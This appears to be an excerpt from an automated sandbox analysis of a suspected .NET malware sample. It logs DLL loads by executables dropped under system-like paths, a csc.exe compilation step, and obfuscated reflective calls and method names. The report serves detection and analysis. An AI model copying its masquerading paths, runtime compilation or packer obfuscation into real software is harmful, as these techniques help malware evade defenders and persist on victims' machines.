                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: cryptsp.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: rsaenh.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: cryptbase.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: sspicli.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: ktmw32.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: wbemcomn.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: amsi.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: userenv.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: iphlpapi.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: dnsapi.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: dhcpcsvc6.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: dhcpcsvc.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: winnsi.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: rasapi32.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: rasman.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: rtutils.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: mswsock.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: winhttp.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: uxtheme.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: winmm.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: winmmbase.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: mmdevapi.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: devobj.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: ksuser.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: avrt.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: audioses.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: powrprof.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: umpdc.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: msacm32.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: midimap.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: edputil.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: dwrite.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: windowscodecs.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: ntmarta.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: dpapi.dll
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeSection loaded: mscoree.dll
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeSection loaded: kernel.appcore.dll
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeSection loaded: version.dll
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeSection loaded: windows.storage.dll
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeSection loaded: wldp.dll
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeSection loaded: profapi.dll
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeSection loaded: cryptsp.dll
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeSection loaded: rsaenh.dll
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeSection loaded: cryptbase.dll
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                            Source: Window RecorderWindow detected: More than 3 window changes detected
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeDirectory created: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeDirectory created: C:\Program Files\WindowsPowerShell\Configuration\Registration\27d1bcfc3c54e0Jump to behavior
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeStatic file information: File size 3038208 > 1048576
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x2e5400
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\od53iwxz\od53iwxz.pdb source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, 00000000.00000002.1718805809.0000000002EBE000.00000004.00000800.00020000.00000000.sdmp

                            Data Obfuscation

                            barindex
                            .NET source code contains method to dynamically call methods (often used by packers)
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, AJRTsBVOnfdpTDlf5PX.cs.Net Code: Type.GetTypeFromHandle(Xr4ZIyrd95H8h9HFcRf.jitnEEVdkWX(16777425)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(Xr4ZIyrd95H8h9HFcRf.jitnEEVdkWX(16777246)),Type.GetTypeFromHandle(Xr4ZIyrd95H8h9HFcRf.jitnEEVdkWX(16777260))})
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\od53iwxz\od53iwxz.cmdline"
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\od53iwxz\od53iwxz.cmdline"Jump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeCode function: 0_2_00007FFD9BAE6224 push es; retf 0_2_00007FFD9BAE6225
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FFD9B76D2A5 pushad ; iretd 19_2_00007FFD9B76D2A6
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFD9B77D2A5 pushad ; iretd 22_2_00007FFD9B77D2A6
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFD9B962316 push 8B485F93h; iretd 22_2_00007FFD9B96231B
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeCode function: 49_2_00007FFD9B8D762C push E8FFFFD1h; retf 49_2_00007FFD9B8D7631
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeCode function: 50_2_00007FFD9B8D762C push E8FFFFD1h; retf 50_2_00007FFD9B8D7631
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeCode function: 51_2_00007FFD9B8B762C push E8FFFFD1h; retf 51_2_00007FFD9B8B7631
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeCode function: 53_2_00007FFD9B8A762C push E8FFFFD1h; retf 53_2_00007FFD9B8A7631
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, nVGn62mhEbOvCjoGrYq.csHigh entropy of concatenated method names: 'wNQmJK3IOn', 'MVRmdNQePp', 'rJemSiOpwo', 'sOoxydc9Df6DymjvEPpC', 'JPfiy3c9up3JyoyYmMeP', 'sFbMZEc9oQLwkfKAtdu6', 'LKA2K1c9TFuVWAHctsV8', 'W47Fqic9ZIkUcTlOnQ90', 'OW7tGvc9Y22KbQvNGCxL'
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, aj5p7uZOy01etPY2mhX.csHigh entropy of concatenated method names: 'W7WZgy6JAv', 'TsXZ3OJGJj', 'M62', '_1Xu', 'LuR', '_4p3', 'HVh', 'MWCZA5sjjw', '_96S', '_9s5'
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, IdVhvJi8NGHLavcyWEV.csHigh entropy of concatenated method names: 'KhQiU48Qse', 'jaYilrBlX3', 'qrqibUR9cL', 'wjbiVga4mH', 'TyjiMr9EwN', 'JPairQ8NTQ', 'lWOipYtaVO', 'fINiziviDa', 'NA8q5WxxLL', 'cYLqcVPJnE'
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, yXPCSHQCy4Of51IUPHs.csHigh entropy of concatenated method names: 'vCJQFYuPOo', 'PltQ1eM9EE', 'C2mQmpncSC', 'GGWejPcZ7ZOWksfLrv7B', 'IJbTghcZG1qUMHsM073D', 'QF36idcZkbvrQOJNlNq4', 'EAl7aRcZwgWQa2Weusxr', 'fhVl8acZxD3yNjyGWqVI', 'JKsijtcZijA4ZMQ13p7r'
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, L83HgudUYrg6XMBKuXO.csHigh entropy of concatenated method names: 'b8aiWycGixuBD5uguAFD', 'X0UVFUcGwdgJ1Hr6Ig8b', 'MJoFILcGxV7Uiblo7K1o', 'sZJOmycGqRctpKretFMk', 'TWmgu3TRXU', 'etfwkbcGRLQdK1aJasib', 'btugZCcGUlxqZWrYSy49', 'R9IH3bcGlw0vtJhTPPp4', 'CNQDS0cGbNAlmk9JdNRv', 'hQlgTxUdMu'
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, DITvHD63XRjbsRrl5RH.csHigh entropy of concatenated method names: 'iUA6YPre49', 'QwQhXHc4SIBpvuK3lNxV', 'S4OimWc4sHVsRD3h3R5q', 'aOSMocc4JMF2lFxMqHit', 'JTQ3iec4dgjAKmieWwy4', 'CyDJsEc40I6k3Af1foi3', 'bbN6uVEiUR', 'R7DnFac4233VuBgn8LWL', 'zosumBc4BZPyVHyPJFOH', 'zk9OsGc4C2YOoMKJ6cw5'
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, iSiUMIgKoKxfrIXQuA8.csHigh entropy of concatenated method names: 'pZcDu8x7VZ', 'jxSDoZ29Jr', 'eB9GIPc79CvfwU5qm0QK', 'seoXZJc7yJqHBSj6cFPr', 'orrtpJc7v7wo2SOaOHWu', 'AeQQwyc7L4vOOxIYQipd', 'LZ1UWUc7t64htGYuM1Oh', 'UAgDX5EFFt', 'nY8bCwc77At0DoOxWkhh', 'zXLY7Yc7GFT5EKFZnLaF'
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, djd4LnE65ePnSI8mgnH.csHigh entropy of concatenated method names: 'amCE0w3Wxk', 'tUlEOXeLAP', 'AG4YYIcWI5pyDwQ6VGUV', 'GTf0JhcWE43UoPEeEnEB', 'V3hBY2cWQ42TFJR4nTjI', 'FlW3TNcWan7l5soIieDC', 'j7eEdlZJFf', 'S8RESPAqdZ', 'eyhsAOcW5E7RVGgTA81q', 'qVKKxZcXpamw4fDbGUOP'
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, hNqQ4h8e95NdmFPkMSw.csHigh entropy of concatenated method names: 'gbq84PRkqY', 'zI78vgYIUZ', 'Ys28tVEjke', 'n0c8NIH2lu', 'DFy8GgGeLx', 'SpC8k4uiFf', 'Si087MDq3p', 'GPB8wiwZZ0', '_0023Nn', 'Dispose'
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, o9C0INaLbYOsZWKJfAq.csHigh entropy of concatenated method names: 'BT6air1LrA', 'pm9ecLceKACFwA9hHR6f', 'rSGYgNceyTLHFH3p1VLQ', 'oym4qRcevDQvjsT6ZNfT', 'zTmaNakkXI', 'gKXaGwJMrZ', 'A66ak7K9VH', 'Y4emYNceXrwOg8gL4uxv', 'ODjhysceWx50hG8ZclF2', 's4DpfPceYkXDK3qKOpXr'
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, CypBWHQJsoyZRpfKvKt.csHigh entropy of concatenated method names: 'hvFQTv63m3', 'zjBQZGruwU', 'CGdQYgrWQy', 'A3v3UZcYIyp9Djbr0RGR', 'LG8Pi2cYEL76Xh63ZbVR', 'dvpEPxcYQ02TZh8P3oIJ', 'vJ9JDCcYaIYBCGg1gapJ', 'iMNQASbHST', 'JDsQuTVpUX', 'hIDx1ucY55J1eDWcOrVP'
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, qPxLbdyS7S3rBo4shCw.csHigh entropy of concatenated method names: 'Xwly0gBxPr', 'xW4yOpBdqx', 'f1CyfCi5FK', 'Jdpygnop3Z', 'Pwsy3ZTGLi', 'PBmyAO0IpQ', 'NoUyu1RCF9', 'utkyoW3Ayw', 'iuxyDe1O4K', 'BteyTpaG6A'
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, ylUj95Z9T2iK3osm8ui.csHigh entropy of concatenated method names: 'TW8Ztba3xQ', 'B0NZNuUG1F', 'mdKZGnh07b', 'ffTZkGCrEX', 'ATuZ7VKhCo', 'vDsZwasskD', '_4tg', 'wk8', '_59a', '_914'
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, nqKWlmzZ4b7lqVMVQj.csHigh entropy of concatenated method names: 'J3YccAIwvc', 'vXMcQe7SCA', 'bZhcaG0CXR', 'NDAcIHpvBf', 'R02cETxAT4', 'HDhc6YtUdy', 'vXNcBDmx2a', 'lociGvcDZXWjho9nHEuU', 'F3L7AjcDYCOooFV8Vtg7', 'HcF0HAcDeo0r2V5vYAyA'
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, YXxfMbWgkj6CRaotLGO.csHigh entropy of concatenated method names: 'n0f4PBBPo7', 'qWcBTcc8BFAbWBpctBbE', 'XC2c8yc86Fw0XiWFXrak', 'dx3bfec8jw683rZ9DNSV', 'i5X', 'OZ3WArhg5f', 'W93', 'L67', '_2PR', 'p6J'
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, D6hdGhqVEsQOnb0ok04.csHigh entropy of concatenated method names: 'gQr8FLv0aE', 'nCMP2Hcb3sqe79UpMvb6', 'rLTYhIcbfrsmoDI8WDgN', 'oMOKs1cbgd6ExqRCFZxI', 'CPX', 'h7V', 'G6s', '_2r8', 'yZRcE4fluxP', 'xKUcEH3FK9H'
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, pGpnRXUpTx66Clo61bt.csHigh entropy of concatenated method names: 'x6blndpyIr', 'sQUlQRLcLg', 'R12CVkcM75SHJkUBMJA8', 'TdmvIJcMwrK3V0eHWqfh', 'udySOCcMGCbTTgeZUcWc', 'y4qOqmcMkjJlU5xcem87', 'Pk9l8KcMxy5tBm0PlHQs', 'B2GJ01cMi8JN2BP1lXdV', 'D6ol5DVV7q', 'c9ZEgwcMLwcbR2JaNs4k'
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, J2PGnimRMwqtYcPWn4s.csHigh entropy of concatenated method names: 'I4Umlp5XsZ', 'grTmbywQHP', 'nAQmVaTQjK', 'yrbmMVWXaX', 'nYsmrnvBud', 'DP1Y64c9weH8FohBk7Mq', 'zETL07c9kLQF55jMRA1J', 'oljPjuc97erhu7FluoFo', 'L0RFAOc9x1eZarOvQm1b', 'mT1Oyqc9iBe6bIYn1OXJ'
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, Gg4T5h2cMA1gGGn1gHN.csHigh entropy of concatenated method names: '_4FP', '_141', 'BMmcjG0ZSdv', '_156', 'mIocjkKAJQ5', 'muwfe6cyV4fwSNagnoKF', 'nM0xE7cyMq8HP6qURp3U', 's958oEcyrt41Ib2uauS3', 'erIvGscypllkahedFPRU', 'PWBhHlcyzb8C7YiOTZQi'
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, ntvIxdmXR5RIOkPwGAt.csHigh entropy of concatenated method names: 'j9l', 'pACm4gGYc3', 'OGamHg9YHc', 'en8mKCDbM7', 'FJ3mylx9Bj', 'YQ8mviQ19u', 'LOhm9wa4qm', 'rs3n88c94Ls0EFkaW8dp', 'vMZm9Qc9X7pEhEvGNNJ9', 'bghYIcc9WsiLOT4TTjHv'
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, dIPx8yJg7jtx7VclTIr.csHigh entropy of concatenated method names: 'q4pJ7qLlZW', 'S1OJAIS9O8', 'IaEJuMKnuy', 'YdWJogWj0H', 'AZyJDv458w', 'LnSJTnDi3g', 'MU2JZoP9wi', 'oT5JYhRBbC', 'pGxJetH5wa', 'HttJXeZKmH'
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, HBmrGTBg0vkFaLF3Lir.csHigh entropy of concatenated method names: '_64Z', 'd65', 'h4LcjueKis5', 'QlCca54XJUB', 'BBXBA2CqZW', 't7TMuhcHbrtD35E91Oxv', 'cXXcjecHV8jiylPiYIH9', 'nAnQ3GcHMKJI23lpjEKB', 'rFklxmcHr8aNagm1Ixub', 'uw8DP2cHprAcQJ4fukjY'
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, ASgSSwrfGG931fjjNEP.csHigh entropy of concatenated method names: 'Q4vrWTkFcx', 'VvRr4lCEHO', 'Qy2rHd0Vfl', 'Ob3rK2pJWa', 'Q1trysBtsx', 'gt4rvArp1Y', 'qbor9PlJK2', 'OBbrLhHjcA', 'WuNrtVMPra', 'B7vrNnZNBX'
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, lJ81hDq8lDfvClubIF0.csHigh entropy of concatenated method names: 'RRncj7EARTs', 'xhhqUP1xZi', 'chuqlnm8VV', 'NfAqbRfc8w', 'd8fYn9clxpQAokHilDoF', 'MQVJmvcliuaaxyH4agvL', 'R5OS28clqWiK7K0yC2sL', 'hmlh2scl843bjrd9ecyw', 'MsXwNMclRBoatnpkl4PU', 'uyNrtXclUApgAPxkpWwW'
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, OsFDKCQxHxgAS3Dh72h.csHigh entropy of concatenated method names: 'IyKQRcMK6U', 'yijfhOcYDFJQ0yXC5iZI', 'bkIp85cYuWqrmDYw98Y5', 'd9kADccYoeOXkHsSBPFL', 'htCQqhHSHn', 'jLyJ7CcYfg75KW63fFcV', 'ghq0hkcYgfSivLqx5OCv', 'fTr4DPcY3nCuKyD0hmyu', 'Wtx3lNcY0j0fDa8jtQyK', 'tNu3oUcYOQPnmK6KVaH0'
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, hEkdFJBDphtPuUgfvTN.csHigh entropy of concatenated method names: '_71a', 'd65', 'QJqca2IG215', 'z0xcaFOUYTB', 'H36cjo2M16t', 'QlCca54XJUB', 'NkSnracK5vqhagJs26lf', 'hGIAe5cKcBJpVNtGBkKf', 'PbLZogcKnyKR4TFB7rMW', 'pp6EGLcKQNEZfPObRmOO'
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, LBr7nhBGq3k7WCwFwmB.csHigh entropy of concatenated method names: 'IDV', 'd65', 'EyxcjT1UcP7', 'QlCca54XJUB', 'HlfB7Cu4jR', 'dV9LTEcKde0RvUWNHQRR', 'JMlH51cKSCSxLTqb8rGw', 'b74hHRcKsgm1OgxTV3Ma', 'Hh74jucK0hnKh4OFhe3p', 'cC6goncKOGFvx09Z50fu'
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, MuwoDMBeqbQIU3n7NTe.csHigh entropy of concatenated method names: 'GWUBLUVd3m', 'DBnejocKmcqImcNdjkWr', 'pmAZG3cKFh0GZl4SlVUZ', 'VQnbPScK1oneOv04qMjq', 'bHwynacKhA3H559Vj0D5', 'x2s5fgcKPPwuN7aKcecV', 'UU8', 'd65', 'f4ycambtfT0', 'iFKcahxZD8w'
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, EHhaFynPrI4tmv45psk.csHigh entropy of concatenated method names: 'DbKndT1KxA', 'sptnSB0WgF', 'rRvtmtcTRCx8kpolloxa', 'ACZtHVcTqu741ONVy94w', 'K38sJocT8SBBKqnwF5va', 'tLBkv6cTULbBMMgcBtMK', 'JemJstcTlqWPefKdq2kx', 'vws63JcTbWIZujxSadjK', 'ycrfOfcTV5j4SkjkSXIc'
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, REVIeSThUe8cWnPhjsa.csHigh entropy of concatenated method names: 'y7oTJLxijR', 'briTdRj8I3', 'P6fTS0QYcw', 'GB8RKncwSQLCFT4S5eEi', 'Kqln2qcwssxdO5QCUgYn', 'GkFmaacw07elck3Zr6UM', 'nVA9UacwOZ6EkPS33EA6', 'VdB9jecwfuBtRPANGFYo'
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, SuARdTTQo6o2cLNyv2D.csHigh entropy of concatenated method names: 'bSVTIKOZ7e', 'rYRTEeF3Am', 'DMZT6kgfpm', 'fMyTjYuSUX', 'vaeTBMN5B8', 'cKBpcicwIX7Fii1JIHIe', 'Uy6D7UcwQJRb8amKen9E', 'pRglxucwapxMKupK3J6c', 'HQ4bq0cwET1IQgvoS0BB', 'LyHR2ocw60uXy4iXPPeM'
